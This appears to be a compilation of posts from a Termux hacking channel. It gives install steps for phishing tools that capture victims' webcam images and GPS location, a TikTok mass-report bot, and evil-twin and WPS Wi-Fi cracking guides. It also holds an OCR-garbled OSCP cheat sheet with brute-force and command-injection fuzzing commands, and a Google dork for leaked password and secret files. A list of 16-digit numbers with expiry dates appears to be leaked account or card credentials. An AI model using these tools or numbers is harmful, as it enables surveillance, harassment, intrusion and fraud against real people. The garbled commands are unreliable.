¶¶ symbiote
Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. IP / Device Details By requesting camera permission on the victim's device,
#ip #device #info #browser #phishing #camera #seeker #vidphisher #storm-breaker #ngrok #localhost

📍sudo apt update && upgrade
📍sudo apt install python -y
📍sudo apt install wget -y
📍sudo apt install php -y
📍sudo apt install openssh-client -y
📍sudo apt install jq -y
📍sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <<<y >/dev/null 2>&1

📍git clone https://github.com/hasanfirnas/symbiote
📍cd symbiote
📍python3 symbiote.py
📍cd Server
📍./loclx account login
now enter your access token from https://localxpose.io/



¶¶ To check for cam file :
📍cd symbiote
📍cd CapturedData
📍ls
📍termux-open <file_name>

¶¶ Youtube link :
https://youtu.be/j8rTc3CI7UA

¶¶ SWS-Recon-Tool
SWS-Recon is a Python Tool designed to performed Reconnaissance on the given target website- Domain or SubDomain. SWS-Recon collects information such as Google Dork, DNS Information, Sub Domains, PortScan, Subdomain takeovers, Reconnaissance On Github and much more vulnerability scan. #recon #osint #info #nethunter


📍sudo apt-get install libxml2-dev libxslt-dev
📍git clone https://github.com/ShobhitMishra-bot/SWS-Recon-Tool.git
📍cd SWS-Recon-Tool
📍pip3 install -r requirements.txt
📍python3 SWS-Recon.py -h

¶¶phisherprice
Multi-Functional Pentest Tool, Command Them All From One Script. #recon #cracking #Th3inspector #networking #TermuxToolx #nethunter

📍git clone https://github.com/SirCryptic/phisherprice
📍cd phisherprice
📍chmod +x phisherprice.sh
📍sudo ./phisherprice.sh
or
📍sudo bash phisherprice.sh

¶¶ Changing API Key :
¶¶ Example : sudo nano phisherprice.sh

https://rapidapi.com/blackbunny/api/bank-card-bin-num-check
https://apilayer.com/marketplace/email_verification-api
https://apilayer.com/marketplace/number_verification-api
https://www.shodan.io

│Main Menu
├──────────────────
│1 │Recon
│2 │Cracking
│3 │AutoxSploits
│4 │Networking
│5 │C.Y.O xSploits
│6 │AutoExif
│7 │SE Toolkit
│8 │Start Th3inspector
│u │Update Script
│c │Contact Information
├───────────────

¶¶ ghauri
Advance SQL Injection Scanner
#sql #scan #url #vuln

📍git clone https://github.com/r0oth3x49/ghauri.git
📍cd ghauri
📍ls
📍pip install -r requirements.txt
📍python3 setup.py install
📍ghauri -h
📍ghauri -u 'your-url' --dbs

¶¶ hound
Hound is a simple and light tool for information gathering and capture exact GPS coordinates and can also grab basic information about the system and ISP. This tool can be very helpful in information gathering
#track #ip #location #isp #browser

Longitude
Latitude
Device Model
Operating System
Number of CPU Cores
Screen Resolution
User agent
Public IP Address
Browser Name
ISP Information

¶¶ Install on kali/termux

📍apt-get -y install php unzip git wget
📍git clone https://github.com/techchipnet/hound
📍cd hound
📍bash hound.sh

¶¶ ReBomb2 - TikTok Mass Report Bot
THIS DOES NOT GAURANTEE A BAN. STILL UP TO TIKTOK, THIS JUST INCREASES THE CHANCES OF THE RIGHT PERSON SEEING THE REPORT OR CONFUSING THE AI THAT SUPPOSEDLY CONTROLS THE REPORTING.


¶¶ DOWNLOAD THE ZIP FILE "REBOMB2APPWITHPROXIES" Scroll down to the "Rebomb2App"
https://github.com/Sadyyn/ReBomb2

¶¶ TUTORIAL WITH ADDED PROXIES: https://youtu.be/J5nxUckD7Wk
https://youtu.be/MdQrD_H8ZoI

¶¶ Fluxion
#wifihacking #fluxion #kali #nethunter


#Eviltwinattack most of the time we have to use two adapters to work with eviltwin attack on tools like  fluxion and wifiphisher . We changed internel wifi card to a realtek  which will work on wlan0 ( supports monitor mode & packet injection ) You can buy On ebay & aliexpress for around 2 to 4usd  (2.4ghz & 5ghz supports )
wlan1 will be externel wifi adapter
#Wifihacking
#fluxion

¶¶ How to install Fluxion on kali linux
1) https://youtu.be/oGpM48NeLdc
2) https://youtu.be/OBwHhmfuvzQ

¶¶ for android Device must be rooted & Ur device must  have nethunter Supported Kernel & externel wifi adapter like showed on this video : https://t.me/termuxtoolx/2268


¶¶ Fluxion on android zip file
https://t.me/termuxtoolx/2273
¶¶ For wifi adapters search on channel #adapter

#stryker #termux #wifi #deauth #handshakecapture #wordlist #router #scan #vuln #wps #androidwarrior #rooted #kernel #drivers #nethunter #wifite

Application link = Stryker = https://strykerdefence.com/
you can use free version to scan for wps enabled networks ..deauth & capture handshake file

#stryker #termux #wifi #deauth #handshakecapture #wordlist #router #scan #vuln #wps #androidwarrior #rooted #kernel #drivers #nethunter #wifite

Application link = Stryker = https://strykerdefence.com/
you can use free version to scan for wps enabled networks ..deauth & capture handshake file

¶¶ open Stryker after that plug in your wifi adapter ..We used MT7601U adapter ..but awus1900 & 1200 also works and do check if wlan0 works to scan for network before set to wlan1

¶¶ Open Es file Explorer go to Stryker folder / in wordlist -- simply add ( past ) all the wordlist file u want ..

¶¶ Device = Samsung Note9 /SMN960F -V9
https://t.me/termuxtoolx/2268

¶¶ To check for adapter details u can use simpleUSB.apk link & video below
https://t.me/termuxtoolx/2236 (apk)
https://t.me/termuxtoolx/2235 (video )

¶¶ To check for nearby routers details Use Wigle wifi https://play.google.com/store/apps/details?id=net.wigle.wigleandroid

¶¶ IP Tool (wifi Analyzer) https://play.google.com/store/apps/details?id=com.ddm.iptools


¶¶ Rockyou wordlist starting from 8 to 15 mix words
https://t.me/termuxtoolx/2064?single

¶¶ Stryker Official Telegram Channel
https://t.me/strykerapp
https://t.me/strykereng

https://play.google.com/store/apps/details?id=net.mullvad.mullvadvpn

#vpn

5747419652653217 | Exp: 2024-04-01
7852649333043112 | Exp: 2024-04-07
8027322517304568 | Exp: 2023-09-10
5747419652653217 | Exp: 2024-04-01
4699270063653137 | Exp: 2024-07-01
5238755285272851 | Exp: 2023-09-28
8905290060954193 | Exp: 2023-09-20
5127015189953973 | Exp: 2023-10-21
4699270063653137 | Exp: 2024-07-01
4835531754372127 | Exp: 2023-09-20
8228520508576744 | Exp: 2023-09-12
8334931305943361 | Exp: 2023-09-09
8417294887534090 | Exp: 2023-11-04
8450446473114539 | Exp: 2024-07-24
8486345592979924 | Exp: 2023-09-12
8629413833130556 | Exp: 2023-09-13
8637393848336174 | Exp: 2023-12-15
8888584861349251 | Exp: 2024-01-08
8027322517304568 | Exp: 2023-09-10

¶¶ Telegram Channel : https://t.me/hmavpn_1

¶¶ A Curated list of Awesome Python Scripts that Automate Stuffs.

https://github.com/hastagAB/Awesome-Python-Scripts

👨‍💻 Now, I'm sharing my code and notes to help You!!🎯
🔗 Check out
#nmap

==-Nmap====
nmap -p- -sT -sV -A $IP
nmap -p- -sC -sV $IP --0pen
nmap -p- --script=vuln $IP
###HTTP-Methods

nmap --script http-methods --script-args
http-methods. url-path='/webs ite '

###

sed IPs:
grep -oE '((1? [0-9] [0-9]? |2[0-4] [0-
9] |25[0-5])\.){3} (1? [0-9] [0-9]? |2 [0-4]
[0-9] |25 [0-5] ) ' FILE
--Script smb-enum-shares
=EE=======
=E==EE====E============E==
EEE=E==E==:
=========:
==

WPScan & SSL
wpscan--url $URL --disable-tls-checks -
-enumerate p --enumerate t --enumerate u
===WPScan Brute Forceing:
wpscan --url $URL --disable-t ls-checks -
U users -P
/usr/share/wordlists/ rockyou. txt
==Aggressive Plugin Detection:
wpscan --url $URL
plugins-detection aggressive
--enumerate p
========================================

c==Nikto with SSL and Evasion
nikto --host $IP -ssl -evasion 1
SEE EVASION MODALITIES.
E===================================
==dns_recon
dnsrecon -d yourdomain. com
==

===9obuster directory
gobuster dir -u $URL -W
/opt/SecLists/Dis covery/Web-
Content/ raft-medium-directories. txt -k -
t 30

===gobuster files
gobuster dir -u $URL -W
/opt/SecLists/Dis covery/Web-
Content/raft-medium-files. txt -k -t 30
==00buster for SubDoma in brute forcing:
gobuster dns -d doma in.org -w
/opt/SecLists/Discovery/DNS/subdomains-
toplmillion-110000. txt -t 30
"just make sure any DNS name you find
resolves to an in-scope address before
you test it!
====E=======:
=H==E====E====E===E====

==Extract IPs from a text file.
grep -o '[0-9]\{1, 3\}\. [0-9]\{1,3\}\. [0-
9]\{1,3\}\. [0-9]\{1, 3\}' nmapfile. txt
===Wfuzz XSS
Fuzzing===:
wfuzz -C -Z
file, /opt/SecLists/Fuzzing/XSS,/XSS-
BruteLogic. txt "$URL"
wfuzz -C -Z
file, /opt/SecLists/ Fuzzing/XSS,/XSS-
JhaddiX. txt "$URL"
===C0MMAND INJECTION WITH POST DATA
wfuzz -C -Z
file, /opt/SecLists/Fuzzing/command-
injection-commix. txt -d "doi=FUZZ"
"$URL"
===Test for Paramter Existence!
wfuzz -C -Z
file, /opt/SecLists/Dis covery /Web-
Content/burp-parameter-names. txt "$URL"

===AUTHENTICATED FUZZING DIRECTORIES:
wfuzz -C -Z
file, /opt/SecLists/Dis cove ry/Web-
Content/ raft-medium-directories . txt --hc
404 -d "SESSIONID=value" "$URL"
=AUTHENTICATED FILE FUZZING:
wfuzz -C -Z
file, /opt/SecLists/Discove ry/Web-
Content/ raft-med ium-files . txt --hc 404 -
d "SESSIONID=value" "$URL"
===FUZZ Directories :
wfuzz -C -Z
file, /opt/SecLists/Dis covery/Web-
Content/ raft-la rge-d irectories. txt --hc
404 "$URL"
===FUZZ FILES:
wfuzz -C -Z
file, /opt/SecLists/Dis covery/Web-
Content/ raft-la rge-files . txt --hc 404
"$URL"

📚 Learn, practice, and let's achieve OSCP success together! 💪🏆
#OSCP #Cybersecurity #EthicalHacking #TwisterMachine #InfoSec #GitHub #LearnToHack @SaveToNotion @threadreaderapp

🔍 Searching for sensitive files on the web? Here's a Google dork to find filenames that might contain sensitive information. Use it responsibly! #InfoSec #Security #GoogleDork #bugbountytips @SaveToNotion @threadreaderapp

🔍Google dork for searching these filenames on Google:

intext:"filename:config.php" OR
intext:"filename:config.inc.php" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:configuration.php" OR
intext:"filename:.sh_history" OR
intext:"filename:shadow" OR
intext:"filename:proftpdpasswd" OR
intext:"filename:.psafe3" OR
intext:"filename:.pgpass" OR
intext:"filename:manifest.xml" OR
intext:"filename:travis.yml" OR
intext:"filename:vim_settings.xml" OR
intext:"filename:database" OR
intext:"filename:prod.exs" OR
intext:"filename:prod.secret.exs" OR
intext:"filename:.npmrc _auth" OR
intext:"filename:.dockercfg" OR
intext:"filename:WebServers.xml" OR
intext:"filename:.bash_history" OR
intext:"filename:sftp-config.json" OR
intext:"filename:sftp.json" OR
intext:"filename:secrets.yml" OR
intext:"filename:.esmtprc" OR

https://twitter.com/TheMsterDoctor1/status/1754409763914354705?s=19

#osint #Recon #info #phone #socialmedia 

¶¶ Osint Resources:
https://www.osintessentials.com/
https://www.spokeo.com/
https://randhome.io/blog/2019/01/05/2019-osint-guide/
https://www.beenverified.com/
https://www.fastpeoplesearch.com/
https://www.aware-online.com/en/osint-tools/
https://osintframework.com/
https://haveibeenpwned.com/
https://www.osintcurio.us/
https://www.dehashed.com/
https://www.whocalledme.com/


¶¶ Few more tools i found :
https://www.shodan.io/
https://cleanup.pictures/
https://instantusername.com/#/
https://facecheck.id/
https://tineye.com/
https://urlscan.io/
https://pimeyes.com/en
https://github.com/sorenlouv/fb-sleep-stats
https://github.com/laramies/theHarvester

https://github.com/lanmaster53/recon-ng
https://github.com/smicallef/spiderfoot
https://inteltechniques.com/
https://twitter.com/search-advanced?lang=en
https://www.maltego.com/

How to use GoBuster for OSINT?. A couple of weeks ago, I published an… | by cyb_detective | OSINT TEAM
https://osintteam.blog/how-to-use-gobuster-for-osint-905bc9360024